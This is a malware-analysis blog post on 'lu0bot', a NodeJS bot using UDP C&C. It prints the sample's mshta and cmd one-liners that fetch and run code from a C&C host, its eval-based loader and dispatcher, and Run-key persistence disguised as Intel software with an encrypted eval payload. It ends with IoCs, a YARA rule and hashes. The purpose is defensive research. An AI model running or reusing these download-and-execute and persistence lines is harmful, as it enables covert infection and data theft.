Lu0bot – An unknown NodeJS malware using UDP

By: fumko
24 June 2021 at 08:37

In February/March 2021, a curious lightweight payload was observed coming from a well-known load seller platform. Unlike the classic info-stealers being pushed at an industrial level, this one is very different from the current landscape and trends. Facing a grey box is somewhat stressful, since you have no idea what is behind it or how it works, but it also means that you will learn far more than in a standard investigation.

I haven’t felt like this since Qulab. At that time, this AutoIT malware gave me some headaches because of its packer, but after cleaning it and realizing it was rudimentary, the challenge was over. In this case, analyzing NodeJS malware is definitely a different approach.

I will just share my current findings. I don’t have all the answers, but at least it will open the door for further research.

Disclaimer: I don’t know the real name of this malware.

Minimalist C/C++ loader

When lu0bot is deployed on a machine, the first stage is a lightweight 2.5 KB payload with only two section headers.

Curious PE Sections

Written in C/C++, it contains only one function.

void start()
{
  char *buff;

  buff = CmdLine;
  do
  {
    *(DWORD *)buff -= 'NPJO';  // Subtract the key from each DWORD; the key seems random after each build
    buff += 4;
  }
  while ( buff < &CmdLine[424] );
  WinExec(CmdLine, 0);   // ... to the moon ! \o/
  ExitProcess(0);
}

This rudimentary loop decrypts a buffer, unveiling a one-line JavaScript command that is then executed through WinExec().

Simple sub loop for unveiling the next stage
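As an illustration, the subtraction loop can be reproduced offline to decode a dumped buffer. This is only a sketch under assumptions: decodeLoaderBuffer is a hypothetical helper name, the decompiler constant 'NPJO' is assumed to correspond to the 32-bit value 0x4E504A4F, and the buffer is assumed to be processed as little-endian DWORDs.

```javascript
// Hypothetical analyst helper: undo the per-DWORD subtraction done by the loader.
function decodeLoaderBuffer(encrypted, key) {
  const out = Buffer.from(encrypted);          // work on a copy, keep the dump intact
  const end = out.length - (out.length % 4);   // only whole 32-bit words are processed
  for (let off = 0; off < end; off += 4) {
    const word = out.readUInt32LE(off);
    // ">>> 0" wraps the result like a 32-bit register would.
    out.writeUInt32LE((word - key) >>> 0, off);
  }
  return out;
}

// Assumption: 'NPJO' is the multi-character constant 0x4E504A4F.
const sampleKey = Buffer.from("NPJO", "latin1").readUInt32BE(0);
console.log(sampleKey.toString(16)); // 4e504a4f
```

Since the key appears to change with each build, it has to be read from the sample itself before calling the helper.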

MSHTA is used to execute this malicious script, so in terms of monitoring, this interaction is easy to catch.

mshta "javascript: document.write();
42;
y = unescape('%312%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%321%616%654%62%7E%321%32').split('~');
103;
try {
    x = 'WinHttp';
    127;
    x = new ActiveXObject(x + '.' + x + 'Request.5.1');
    26;
    x.open('GET', y[1] + '&a=' + escape(window.navigator.userAgent), !1);
    192;
    x.send();
    37;
    y = 'ipt.S';
    72;
    new ActiveXObject('WScr' + y + 'hell').Run(unescape(unescape(x.responseText)), 0, !2);
    179;
} catch (e) {};
234;;
window.close();"
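The escaped string in this script can be decoded statically, without running anything through MSHTA. The snippet below is a small sketch using decodeURIComponent instead of the legacy unescape; the variable names are only illustrative.

```javascript
// Escaped string copied from the mshta one-liner.
const encoded =
  "%312%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%321%616%654%62%7E%321%32";

// The script splits the decoded string on "~" and uses the second field as URL.
const parts = decodeURIComponent(encoded).split("~");
const loaderUrl = parts[1];

// Print a defanged version so it cannot be clicked by accident.
console.log(loaderUrl.replace(/\./g, "[.]").replace(/^http/, "hxxp"));
// hxxp://hri2[.]xyz/hri/?21a6e4b
```

The numeric statements scattered through the one-liner (42, 103, 127...) have no effect; only the escaped string and the two ActiveXObject calls matter.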

Setting up NodeJs

The script above is designed to perform an HTTP GET request to a C&C (let’s call it the first C&C layer). The response is then executed through a WScript.Shell ActiveXObject.

new ActiveXObject('WScr' + y + 'hell').Run(unescape(unescape(x.responseText)), 0, !2);

Let’s inspect the code (response) step by step

cmd /d/s/c cd /d "%ALLUSERSPROFILE%" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe [...]
  • Set the console working directory to the %ALLUSERSPROFILE% path
  • Create a fake folder named DNTException
[...] || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);
           x.Open("GET",unescape(WScript.Arguments(0^)^),false^);
           x.Send(^);
           b = new ActiveXObject("ADODB.Stream"^);
           b.Type=1;
           b.Open(^);
           b.Write(x.ResponseBody^);
           b.SaveToFile(WScript.Arguments(1^),2^); 
           > get1618489872131.txt 
           & cscript /nologo /e:jscript get1618489872131.txt "http://hri2.xyz/hri/?%HEXVALUE%&b=%HEXVALUE%" node.cab 
           & expand node.cab node.exe 
           & del get1618489872131.txt node.cab 
) [...]
  • Generate a JS script that downloads and saves an archive named “node.cab”
  • Decompress the cab file with the expand command into “node.exe”
  • Delete all the generated files once it’s done
[...] & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1618489872131.txt [...]
  • Recreate a JS script that will execute further code
[...] cscript /nologo /e:jscript get1618489872131.txt "node -e eval(FIRST_STAGE_NODEJS_CODE)" & del get1618489872131.txt [...]

In the end, this whole process is designed to retrieve the required NodeJS runtime.

Lu0bot nodejs loader initialization process

Matryoshka Doll(J)s

Luckily, the code is pretty well written and comprehensible at this layer. It is about 20 lines of code that build the whole malware thanks to one simple API call: eval.

Simplistic lu0bot nodejs loader that is basically the starting point for everything


In my experience, I’m rarely confronted with malware using the UDP protocol to communicate with its C&Cs. Likewise, I don’t think it’s usual to switch from TCP to UDP as if it were nothing. When I analyzed it for the first time, I found it odd to see so much noisy activity on the machine with just two HTTP requests. Then I realized that I was only watching the visible part of a gigantic iceberg…

Well played OwO

For those who are uncomfortable with NodeJS, the script is designed to periodically send UDP requests over port 19584 to two specific domains. When a message is received, it is decrypted with a standard XOR decryption loop, and the output is ready-to-use code that is executed right after with eval. Interestingly, the first byte of the response is also part of the key, which means that each response is likely to look different on the wire even when the underlying content is the same.
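The exact key schedule is not reproduced here. The sketch below only illustrates the general idea of a repeating-key XOR where the first byte of the message is mixed into the key. The static key, the way the first byte is combined with it, and the function names are all assumptions made for the example, not the malware's real scheme.

```javascript
// Assumption: the first byte acts as a per-message seed XORed into a static key.
function xorDecode(message, key) {
  const seed = message[0];
  const out = Buffer.alloc(message.length - 1);
  for (let i = 1; i < message.length; i++) {
    out[i - 1] = message[i] ^ key[(i - 1) % key.length] ^ seed;
  }
  return out;
}

// Matching encoder, only used to build test messages for the decoder.
function xorEncode(plain, key, seed) {
  const out = Buffer.alloc(plain.length + 1);
  out[0] = seed;
  for (let i = 0; i < plain.length; i++) {
    out[i + 1] = plain[i] ^ key[i % key.length] ^ seed;
  }
  return out;
}

const demoKey = Buffer.from("hypothetical-key");   // placeholder, not from a sample
const first = xorEncode(Buffer.from("same content"), demoKey, 0x11);
const second = xorEncode(Buffer.from("same content"), demoKey, 0x22);

console.log(first.equals(second));                 // false: different bytes on the wire
console.log(xorDecode(second, demoKey).toString()); // same content
```

With such a scheme, a signature on the raw UDP payload is unlikely to match twice, which fits the observation that identical responses do not look identical.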

In the end, lu0bot is basically working in that way

lu0bot nodejs malware architecture

After digging into each piece of executed code, it really feels like you are playing with matryoshka dolls, due to the recursive eval loops unveiling more content/functions over time. It’s also the reason why this malware can seem simple and complex at the same time if you aren’t experienced with this strategy.

The madness philosophy behind eval() calls

To add more confusion, it uses different cryptographic algorithms, whether for communications or for storing variable content:

  • XOR
  • AES-128-CBC
  • Diffie-Hellman
  • Blowfish

Understanding Lu0bot variables

S (as Socket)

  • Fundamental Variable
  • UDP communications with C&C’s
  • Receiving main classes/variables
  • Executing “main branches” code
function om1(r,q,m)      # Object Message 1
 |--> r # Remote Address Information
 |--> q # Query 
 |--> m # Message

function c1r(m,o,d)       # Call 1 Response
 |--> m # Message
 |--> o # Object
 |--> d # Data

function sc/c1/c2/c3(m,r) # SetupCall/Call1/Call2/Call3
 |--> m # Message
 |--> r # Remote Address Information

function ss(p,q,c,d)      # ScriptSetup / SocketSetup
 |--> p # Personal ID
 |--> q # Query 
 |--> c # Crypto/Cipher
 |--> d # Data

function f()              # UDP C2 communications

KO (as Key Object ?)

  • lu0bot mastermind
  • Containing all bot information
    • C&C side
    • Client side
  • storing fundamental handle functions for task manager(s)
    • eval | buffer | file
ko {
    pid:     # Personal ID
    aid:     # Address ID (C2)
    q:       # Query
    t:       # Timestamp
    lq: {
             # Query List
    },
    pk:      # Public Key
    k:       # Key
    mp: {},  # Module Packet/Package 
    mp_new: [Function: mp_new],        # New Packet/Package in the queue
    mp_get: [Function: mp_get],        # Get Packet/Package from the queue
    mp_count: [Function: mp_count],    # Packet/Package Counter
    mp_loss: [Function: mp_loss],      # ???
    mp_del: [Function: mp_del],        # Delete Packet/Package from the queue
    mp_dtchk: [Function: mp_dtchk],    # Data Check
    mp_dtsum: [Function: mp_dtsum],    # Data Sum
    mp_pset: [Function: mp_pset],      # Updating Packet/Package from the queue
    h: {                               # Handle
        eval: [Function],              
        bufwrite: [Function],
        bufread: [Function],
        filewrite: [Function],
        fileread: [Function]
    },
    mp_opnew: [Function: mp_opnew],    # Create New
    mp_opstat: [Function: mp_opstat],  # get stats from MP
    mp_pget: [Function],               # Get Packet/Package from MP
    mp_pget_ev: [Function]             # Get Packet/Package Timer Intervals
}

MP

  • Module Package/Packet/Program ?
  • Monitoring and logging an executed task/script.
mp:                              
   { key:                        # Key is Personal ID
      { id:  ,                   # Key ID (Event ID)
        pid: ,                   # Personal ID
        gen:  ,                  # Starting Timestamp
        last: ,                  # Last Tick Update
        tmr: [Object],           # Timer
        p: {},                   # Package/Packet
        psz:                     # Package/Packet Size
        btotal:                  # ???
        type: 'upload',          # Upload/Download type
        hn: 'bufread',           # Handle name called
        target: 'binit',         # Script name called (From C&C)
        fp: ,                    # Buffer
        size: ,                  # Size
        fcb: [Function],         # FailCallBack
        rcb: [Function],         # ???
        interval: 200,           # Interval Timer
        last_sev: 1622641866909, # Last Timer Event
        stmr: false              # Script Timer
}

Ingenious trick for calling functions dynamically

When reversing malware, you are almost always confronted with maldevs hiding API calls with tricks like GetProcAddress or hashing.

function sc(m, r) {
    if (!m || m.length < 34) return;
    m[16] ^= m[2];
    m[17] ^= m[3];
    var l = m.readUInt16BE(16);
    if (18 + l > m.length) return;
    var ko = s.pk[r.address + ' ' + r.port];
    var c = crypto.createDecipheriv('aes-128-cbc', ko.k, m.slice(0, 16));
    m = Buffer.concat([c.update(m.slice(18, 18 + l)), c.final()]);
    m = {
        q: m.readUInt32BE(0),
        c: m.readUInt16BE(4),
        ko: ko,
        d: m.slice(6)
    };
    l = 'c' + m.c;        // Function name is now saved
    if (s[l]) s[l](m, r);
}
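Read as a packet format, sc() expects a 16-byte IV, a 16-bit big-endian length masked with bytes 2 and 3 of the IV, then an AES-128-CBC ciphertext whose plaintext starts with q (32 bits) and c (16 bits). The sketch below is a hedged offline parser for that layout. parsePacket and buildPacket are hypothetical names, the builder exists only to produce test input, and the key is a placeholder.

```javascript
const crypto = require("crypto");

// Parse one datagram laid out like the input of sc(): IV | masked length | ciphertext.
function parsePacket(packet, key) {
  if (!packet || packet.length < 34) return null;   // same minimum size as sc()
  const iv = packet.subarray(0, 16);
  // Unmask the length without modifying the captured packet.
  const len = ((packet[16] ^ packet[2]) << 8) | (packet[17] ^ packet[3]);
  if (18 + len > packet.length) return null;
  const dec = crypto.createDecipheriv("aes-128-cbc", key, iv);
  const plain = Buffer.concat([dec.update(packet.subarray(18, 18 + len)), dec.final()]);
  return { q: plain.readUInt32BE(0), c: plain.readUInt16BE(4), d: plain.subarray(6) };
}

// Hypothetical builder mirroring the layout, used only for testing the parser.
function buildPacket(q, c, data, key, iv) {
  const head = Buffer.alloc(6);
  head.writeUInt32BE(q, 0);
  head.writeUInt16BE(c, 4);
  const enc = crypto.createCipheriv("aes-128-cbc", key, iv);
  const body = Buffer.concat([enc.update(Buffer.concat([head, data])), enc.final()]);
  const len = Buffer.alloc(2);
  len.writeUInt16BE(body.length, 0);
  len[0] ^= iv[2];                                  // mask with IV bytes 2 and 3
  len[1] ^= iv[3];
  return Buffer.concat([iv, len, body]);
}

const testKey = Buffer.alloc(16, 1);                // placeholder key
const testIv = Buffer.from("000102030405060708090a0b0c0d0e0f", "hex");
const parsed = parsePacket(buildPacket(1234, 1, Buffer.from("hi"), testKey, testIv), testKey);
console.log(parsed.q, parsed.c, parsed.d.toString()); // 1234 1 hi
```

In a real capture, the key would be the k value stored in the ko object associated with the remote address and port.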


As someone who is not really experienced in the NodeJS environment, I didn’t immediately catch the trick performed here, but for a web developer I believe it is likely obvious (or maybe I’m wrong). What you really need to pay attention to is what happens with the “c” character and m.c.

According to the NodeJS documentation, Buffer.readUInt16BE() reads an unsigned, big-endian 16-bit integer from a buffer at the specified offset.

Buffer.readUInt16BE( offset )

In a real-case scenario, m.c will hold, for example, the value 1, so the variable l becomes “c1”, the name of a function stored in the global variable s. In the end, s[“c1”](m,r) is equivalent to s.c1(m,r).
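The same pattern can be reproduced in a few harmless lines. This is a minimal sketch: the handlers object and its return strings are invented for the example, only the name-building logic mirrors sc().

```javascript
// Stand-in for the global "s" object: functions are looked up by a computed name.
const handlers = {
  c1: (msg) => "c1 handled " + msg.d.length + " byte(s)",
  c2: (msg) => "c2 handled " + msg.d.length + " byte(s)",
};

function dispatch(plain) {
  const msg = {
    q: plain.readUInt32BE(0),   // query id
    c: plain.readUInt16BE(4),   // call number, read as a big-endian 16-bit integer
    d: plain.subarray(6),       // remaining data
  };
  const name = "c" + msg.c;     // 1 -> "c1", 2 -> "c2", ...
  if (typeof handlers[name] === "function") return handlers[name](msg);
  return undefined;             // unknown call numbers are silently ignored
}

console.log(dispatch(Buffer.from([0, 0, 0, 7, 0, 1, 0x41, 0x42]))); // c1 handled 2 byte(s)
```

No function name ever appears next to a call site, so a search for "c1(" in the code will not reveal who invokes it.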

A well-done task manager architecture

Q variable used as Macro PoV Task Manager

  • “Q” is designed to be the main task manager.
  • If the Q value is not in LQ, it is added to the LQ stack, then the code content from m (message) is executed with eval.
if (!lq[q]) {                               // if query not in the queue, creating it
    lq[q] = [0, false];
    setTimeout(function() {
        delete lq[q]
    }, 30000);
    try {
        for (var p = 0; p < m.d.length; p++)
            if (!m.d[p]) break;
        var es = m.d.slice(0, p).toString(); // es -> Execute Script
        m.d = m.d.slice(p + 1);
        if (!m.d.length) m.d = false;
        eval(es)                             // eval, our sweet eval...
    } catch (e) {
        console.log(e);
    }
    return;
}
if (lq[q][0]) {
    s.ss(ko.pid, q, 1, lq[q][1]);
}
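For analysis purposes, the interesting part of this snippet is how m.d is split: everything before the first null byte is the script, everything after it is data. The sketch below extracts both parts without evaluating anything. splitScriptAndData is a hypothetical helper name.

```javascript
// Split a decrypted message body into "script" and "data" at the first null byte.
function splitScriptAndData(d) {
  const nul = d.indexOf(0);                       // first 0x00 byte, -1 if absent
  const end = nul === -1 ? d.length : nul;
  const script = d.subarray(0, end).toString();   // what the sample passes to eval
  const rest = d.subarray(end + 1);
  return { script: script, data: rest.length ? rest : false };
}

const body = Buffer.concat([Buffer.from("1+1"), Buffer.from([0]), Buffer.from("xyz")]);
const split = splitScriptAndData(body);
console.log(split.script, split.data.toString()); // 1+1 xyz
```

Logging the script string instead of running it is a simple way to collect each layer of the matryoshka.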

MP variable used as Micro PoV Task Manager

  • “MP” is designed to execute tasks coming from C&C’s.
  • Each task is executed independently!
function mp_opnew(m) {

    var o = false;                       // o -> object
    try {
        o = JSON.parse(m.d);             // m.d (message.data) is saved into o
    } catch (e) {}
    if (!o || !o.id) return c1r(m, -1);  // if o empty, or no id, returning -1 
    if (!ko.h[o.hn]) return c1r(m, -2);  // if no functions set from hn, returning -2
    var mp = ko.mp_new(o.id);            // Creating mp ---------------------------
    for (var k in o) mp[k] = o[k];                                                |
    var hr = ko.h[o.hn](mp);                                                      |
    if (!hr) {                                                                    |
        ko.mp_del(mp);                                                            |
        return c1r(m, -3)                // if hr is incomplete, returning -3     |
    }                                                                             |
    c1r(m, hr);                          // returning hr                          |                                                                                             
}                                                                                 |
                                                                                  |
function mp_new(id, ivl) {    <----------------------------------------------------
    var ivl = ivl ? ivl : 5000;          // ivl -> interval
    var now = Date.now();        
    if (!lmp[id]) lmp[id] = {            // mp list 
        id: id,
        pid: ko.pid,
        gen: now,
        last: now,
        tmr: false,
        p: {},
        psz: 0,
        btotal: 0
    };
    var mp = lmp[id];
    if (!mp.tmr) mp.tmr = setInterval(function() {
        if (Date.now() - mp.last > 1000 * 120) {
            ko.mp_del(id);
            return;
        }
        if (mp.tcb) mp.tcb(mp);
    }, ivl);
    mp.last = now;
    return mp;
}
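The first two checks of mp_opnew can be isolated to predict which status code a given task would trigger. This is a simplified sketch: precheckTask is a hypothetical name, the handle list is passed explicitly, and the return value 0 for "checks passed" is an assumption made for the example (the sample returns the handler result instead).

```javascript
// Mirror of the validation order in mp_opnew, without creating any task.
function precheckTask(raw, handleNames) {
  let o = false;
  try {
    o = JSON.parse(raw);
  } catch (e) {
    // Like the sample: invalid JSON leaves o as false.
  }
  if (!o || !o.id) return -1;                     // empty object or missing id
  if (!handleNames.includes(o.hn)) return -2;     // no handler registered under hn
  return 0;                                       // assumption: 0 means "would proceed"
}

const knownHandles = ["eval", "bufwrite", "bufread", "filewrite", "fileread"];
console.log(precheckTask('{"id":"A","hn":"eval"}', knownHandles));  // 0
console.log(precheckTask('{"hn":"eval"}', knownHandles));           // -1
console.log(precheckTask('{"id":"A","hn":"nope"}', knownHandles));  // -2
```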

O (Object) – C&C Task

This object receives tasks from the C&C. Technically, this is (I believe) one of the most interesting variables to track with this malware.

  • It contains 4 or 5 values
    • type.
      • upload
      • download
    • hn : Handle Name
    • sz: Size (Before Zlib decompression)
    • psz: ???
    • target: name of the command/script received from C&C
// o content
{ 
        id: 'XXXXXXXXXXXXXXXXX',
        type: 'upload',
        hn: 'eval',
        sz: 9730,
        psz: 1163,
        target: 'bootstrap-base.js',
} 

In this specific scenario, a file called “bootstrap-base.js” is uploaded from the C&C to the bot, and it will be run through the handle name (hn) function eval.
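The fp buffers shown in the interaction dump of the appendix begin with 1f 8b 08, the gzip magic bytes, which is consistent with the sz field being a size before zlib decompression. A hedged sketch for unpacking such a captured buffer follows. The helper names are hypothetical, and whether every task payload is compressed this way is an assumption.

```javascript
const zlib = require("zlib");

// gzip streams start with 1f 8b, followed by 08 for the deflate method.
function looksLikeGzip(buf) {
  return buf.length >= 3 && buf[0] === 0x1f && buf[1] === 0x8b && buf[2] === 0x08;
}

// Return the decompressed content when the buffer is gzip, the buffer itself otherwise.
function unpackPayload(buf) {
  return looksLikeGzip(buf) ? zlib.gunzipSync(buf) : buf;
}

const packed = zlib.gzipSync(Buffer.from("console.log('stage');"));
console.log(looksLikeGzip(packed));            // true
console.log(unpackPayload(packed).toString()); // console.log('stage');
```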

Summary

Aggressive telemetry harvester

Usually, when malware gathers information from a new bot, it is extremely fast, but here, for 7 to 8 minutes, your VM/machine is literally having a bad time.

Preparing environment

Gathering system information

Process info
tasklist /fo csv /nh
wmic process get processid,parentprocessid,name,executablepath /format:csv
qprocess *
Network info
ipconfig.exe /all
route.exe print
netstat.exe -ano
systeminfo.exe /fo csv
Saving Environment & User path(s)
Saving environment variables EI_HOME (EI = EINFO)
EI_DESKTOP
  |--> st.env['EI_HOME'] + '\\Desktop';
EI_DOCUMENTS 
  |--> st.env['EI_HOME'] + '\\Documents';
  |--> st.env['EI_HOME'] + '\\My Documents';
EI_PROGRAMFILES1
  |--> var tdir1 = exports.env_get('ProgramFiles');
  |--> var tdir2 = exports.env_get('ProgramFiles(x86)');
  |--> st.env['EI_HOME'].substr(0,1) + '\\Program Files (x86)';
EI_PROGRAMFILES2
  |--> var tdir3 = exports.env_get('ProgramW6432');
  |--> st.env['EI_HOME'].substr(0,1) + '\\Program Files';
EI_DOWNLOADS
  |-->  st.env['EI_HOME'] + '\\Downloads';
Console information

These two variables are basically conditions to check if the process was performed. (ISCONPROBED is set to true when the whole thing is complete).

env["ISCONPROBED"] = false;
env["ISCONSOLE"] = true;

Required values for completing the task:

env["WINDIR"] = val;
env["TEMP"] = val;
env["USERNAME_RUN"] = val;
env["USERNAME"] =  val;
env["USERNAME_SID"] = s;
env["ALLUSERSPROFILE"] = val;
env["APPDATA"] = val;

Checking old windows versions

Curiously, it’s checking if the bot is using an old Microsoft Windows version.

  • NT 5.X – Windows 2000/XP
  • NT 6.0 – Vista
function check_oldwin(){
    var osr = os.release();

    if(osr.indexOf('5.')===0 || osr.indexOf('6.0')===0) return osr;

    return false;
}
exports.check_oldwin = check_oldwin;

This check is then used as a condition for running an alternative process-listing command:

function ps_list_alt(cb){
    var cmd = ['qprocess','*'];
    if(check_oldwin()) cmd.push('/system');
   ....

Checking ADS (Alternate Data Streams) for hiding content in them later

Checking Alternative Data Streams

Harvesting functions 101

bufstore_save(key,val,opts)         # Save Buffer Storage 
bufstore_get(key,clear)             # Get Buffer Storage 
strstrip(str)                       # String Strip
name_dirty_fncmp(f1,f2)             # Filename Compare (Dirty)
dirvalidate_dirty(file)             # Directory Checking (Dirty)
file_checkbusy(file)                # Checking if file is used
run_detached(args,opts,show)        # Executing command detached
run(args,opts,cb)                   # Run command
check_oldwin()                      # Check if Bot OS is NT 5.x or NT 6.0
ps_list_alt(cb)                     # PS List (Alternative way)
ps_list_tree(list,results,opts,pid) # PS List Tree
ps_list(arg,cb)                     # PS list 
ps_exist(pid)                       # Check if PID Exist
ps_kill(pid)                        # Kill PID
reg_get_parse(out)                  # Parsing Registry Query Result
reg_hkcu_get()                      # Get HKCU
reg_hkcu_replace(path)              # Replace HKCU Path
reg_get(key,cb)                     # Get Content
reg_get_dir(key,cb)                 # Get Directory
reg_get_key(key,cb)                 # Get SubKey
reg_set_key(key,value,type,cb)      # Set SubKey
reg_del_key(key,force,cb)           # Del SubKey
get_einfo_1(ext,cb)                 # Get EINFO Step 1
dirlistinfo(dir,limit)              # Directory Listing info 
get_einfo_2(fcb)                    # Get EINFO Step 2
env_get(key,kv,skiple)              # Get Environment
console_get(cb)                     # Get Console environment variables
console_get_done(cb,err)            # Console Try/Catch callback
console_get_s0(ccb)                 # Console Step 0
console_get_s1(ccb)                 # Console Step 1
console_get_s2(ccb)                 # Console Step 2
console_get_s3(ccb)                 # Console Step 3
ads_test()                          # Checking if bot is using ADS streams
diskser_get_parse(dir,out)          # Parse Disk Serial command results
diskser_get(cb)                     # Get Disk Serial
prepare_dirfile_env(file,cb)        # Prepare Directory File Environment
prepare_file_env(file,cb)           # Prepare File Environment
hash_md5_var(val)                   # MD5 Checksum
getosinfo()                         # Get OS Information
rand(min, max)                      # Rand() \o/
ipctask_start()                     # IPC Task Start (Interprocess Communication)
ipctask_tick()                      # IPC Task Tick (Interprocess Communication)
baseinit_s0(cb)                     # Baseinit Step 0
baseinit_s1(cb)                     # Baseinit Step 1
baseinit_s2(cb)                     # Baseinit Step 2
baseinit_einfo_1_2(cb)              # Baseinit EINFO

Funky Persistence

The persistence is saved in the classic HKCU Run path

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Intel Management Engine Components 4194521778"="wscript.exe /t:30 /nologo /e:jscript \"C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 750293792\" \"C:\ProgramData\Intel\Intel(R) Management Engine Components\" 2371015226"

Critical files are stored into a fake “Intel” folder in ProgramData.

ProgramData
    |-- Intel
        |--  Intel(R) Management Engine Components
            |--> Intel MEC 246919961
            |--> Intel MEC 750293792

Intel MEC 750293792

new ActiveXObject("WScript.shell").Run('"C:\ProgramData\DNTException\node.exe" "' + WScript.Arguments(0) + '\Intel MEC 246919961" ' + WScript.Arguments(1), 0, false);

Intel MEC 246919961

var c = new Buffer((process.argv[2] + 38030944).substr(0, 8));
c = require("crypto").createDecipheriv("bf", c, c);
global["\x65\x76" + "\x61\x6c"](Buffer.concat([c.update(new Buffer("XSpPi1eP/0WpsZRcbNXtfiw8cHqIm5HuTgi3xrsxVbpNFeB6S6BXccVSfA/JcVXWdGhhZhJf4wHv0PwfeP1NjoyopLZF8KonEhv0cWJ7anho0z6s+0FHSixl7V8dQm3DTlEx9zw7nh9SGo7MMQHRGR63gzXnbO7Z9+n3J75SK44dT4fNByIDf4rywWv1+U7FRRfK+GPmwwwkJWLbeEgemADWttHqKYWgEvqEwrfJqAsKU/TS9eowu13njTAufwrwjqjN9tQNCzk5olN0FZ9Cqo/0kE5+HWefh4f626PAubxQQ52X+SuUqYiu6fiLTNPlQ4UVYa6N61tEGX3YlMLlPt9NNulR8Q1phgogDTEBKGcBlzh9Jlg3Q+2Fp84z5Z7YfQKEXkmXl/eob8p4Putzuk0uR7/+Q8k8R2DK1iRyNw5XIsfqhX3HUhBN/3ECQYfz+wBDo/M1re1+VKz4A5KHjRE+xDXu4NcgkFmL6HqzCMIphnh5MZtZEq+X8NHybY2cL1gnJx6DsGTU5oGhzTh/1g9CqG6FOKTswaGupif+mk1lw5GG2P5b5w==", "\x62\x61\x73" + "\x65\x36\x34")), c.final()]).toString());

The workaround is pretty cool in the end

  • WScript is launched after waiting for 30s
  • JScript is calling “Intel MEC 750293792”
  • “Intel MEC 750293792” is executing node.exe with arguments from the upper layer
  • This setup is triggering the script “Intel MEC 246919961”
    • the Integer value from the upper layer(s) is part of the Blowfish key generation
    • global[“\x65\x76” + “\x61\x6c”] is in fact hiding an eval call
    • the encrypted buffer is storing the lu0bot NodeJS loader.
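The key derivation and the hidden strings can be checked without decrypting anything. In the sketch below, deriveKeyMaterial is a hypothetical name, and the argument value is the integer visible at the end of the Run key command line. The Blowfish decryption itself is left out on purpose, since the "bf" cipher may not be available in recent NodeJS builds.

```javascript
// Rebuild the 8-character string used as both Blowfish key and IV.
function deriveKeyMaterial(arg) {
  // String + number concatenates in JavaScript, like process.argv[2] + 38030944.
  return (String(arg) + 38030944).slice(0, 8);
}

// The hex escapes only hide well-known identifiers.
const hiddenCall = "\x65\x76" + "\x61\x6c";
const hiddenEncoding = "\x62\x61\x73" + "\x65\x36\x34";

console.log(deriveKeyMaterial("2371015226")); // 23710152
console.log(hiddenCall, hiddenEncoding);      // eval base64
```

The constant 38030944 only contributes to the key when the command-line argument is shorter than 8 characters, so in practice the value stored in the registry is what unlocks the script.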

Ongoing troubleshooting in production ?

In some of the commands received, it is possible to see lines of code that are disabled. It is unknown whether that is intended or not, but it’s pretty cool to see what the maldev is working on.

It feels like a possible debugging scenario for understanding an issue.

Outdated NodeJS still living and kickin’

Interestingly, lu0bot is using a very old version of node.exe, way older than could be expected.

node.exe used by lu0bot is an outdated one

This build (0.10.48) is apparently from 2016, so in terms of functionality there is little leeway for exploiting NodeJS, since many of its APIs weren’t implemented yet at that time.

NodeJs used is from a 2016 build.
I feel old by looking the changelog…

This limitation is visible when lu0bot pushes and executes “bootstrap-base.js”. On the 0.10.x builds, “Buffer” wasn’t fully implemented yet, so the maldev has implemented the missing function(s) for this specific version. I found this “interesting”, because it means the malware will stay with a static NodeJS runtime environment that won’t change for a while (or likely ever). This is a way of avoiding cryptography troubleshooting, since implementation changes between updates could break the whole project. A fixed build therefore avoids maintenance or unexpected hotfixes that could cost the creator of lu0bot too much time and money (everything is business \o/).

Interesting module version value in bootstrap-base.js

Of course, we can’t rule out that lu0bot may be an old malware, but this statement needs to be taken with caution.

Looking into “bootstrap-base.js”, the module is apparently already at version “6.0.15”. Based on experience, though, versioning is always confusing with maldevs, since they all have a different approach, so with the current elements and the lack of samples, it is pretty hard to say more.

What is the purpose of lu0bot ?

Well, to be honest, I don’t know… I hate making suggestions with too little information; it’s dangerous and too risky. I don’t want to lead people down the wrong path. It’s already complicated to explain something with no “public” records, even more when it is in a programming language for that specific purpose. At this stage, it’s smarter to focus on what the code is able to do, and it is certain that it’s a decent data collector.

Also, the simplistic and efficient NodeJS loader code at the core of lu0bot is basically everything and nothing at the same time. The eval function and its multi-layer task manager could lead to any possibility, where each action could be totally independent of the others, so it could offer features like:

  • Backdoor ?
  • Loader ?
  • RAT ?
  • Infostealer ?

All scenarios are possible, but as I said before, I could be right or totally wrong.

Where it could be seen ?

Currently, it seems that lu0bot is pushed irregularly by the well-known load seller Garbage Cleaner in the EU/US zones, with a possible average of 600-1000 new bots per wave, depending on the operator(s) and the day.

Appendix

IoCs

IP

  • 5.188.206[.]211

lu0bot loader C&C’s (HTTP)

  • hr0[.]xyz
  • hr1[.]xyz
  • hr2[.]xyz
  • hr3[.]xyz
  • hr4[.]xyz
  • hr5[.]xyz
  • hr6[.]xyz
  • hr7[.]xyz
  • hr8[.]xyz
  • hr9[.]xyz
  • hr10[.]xyz

lu0bot main C&C’s (UDP side)

  • lu00[.]xyz
  • lu01[.]xyz
  • lu02[.]xyz
  • lu03[.]xyz

Yara

rule lu0bot_cpp_loader
{
    meta:
        author = "Fumik0_"
        description = "Detecting lu0bot C/C++ lightweight loader"

    strings:
        $hex_1 = {
            BE 00 20 40 00 
            89 F7 
            89 F0
            81 C7 ?? 01 00 00 
            81 2E ?? ?? ?? ?? 
            83 C6 04 
            39 FE 
            7C ?? 
            BB 00 00 00 00 
            53 50 
            E8 ?? ?? ?? ??
            E9 ?? ?? ?? ??
        }
    
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and
        (filesize > 2KB and filesize < 5KB) and 
        any of them
    
}

IoCs

fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2  Lu0bot loader.exe
c88e27f257faa0a092652e42ac433892c445fc25dd445f3c25a4354283f6cdbf  Lu0bot loader.exe
b8b28c71591d544333801d4673080140a049f8f5fbd9247ed28064dd80ef15ad  Lu0bot loader.exe
5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f  Lu0bot loader.exe
f186c2ac1ba8c2b9ab9b99c61ad3c831a6676728948ba6a7ab8345121baeaa92  Lu0bot loader.exe


